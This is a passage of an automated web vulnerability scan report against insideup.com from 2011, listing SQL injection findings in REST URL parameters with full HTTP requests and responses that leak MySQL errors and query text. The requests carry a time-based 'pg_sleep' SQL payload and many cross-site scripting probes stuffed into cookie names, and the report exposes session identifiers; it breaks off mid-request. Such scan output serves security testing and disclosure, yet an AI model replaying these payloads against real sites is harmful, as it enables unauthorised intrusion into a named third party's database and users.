Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_' at line 5

1.76. http://www.insideup.com/ppc/leadflow/bulo00/project_dynamic_page_updated.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow'/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:23:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ea3h2adb0iur0ov55954r7kte7; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow'/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow'/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow'/bulo0' at line 5

Request 2

POST /ppc/leadflow''/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:23:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=09k8pvf9gco00a8bjhq1m7n193; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/bulo00/project_dynamic_page_updated.php was not found on this server.</p>

1.77. http://www.insideup.com/ppc/leadflow/bulo00/project_dynamic_page_updated.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/bulo00'/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:23:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=t1q2r12fpjit0oedkjbhhb2986; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/bulo00'/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00'/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00' at line 5

Request 2

POST /ppc/leadflow/bulo00''/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 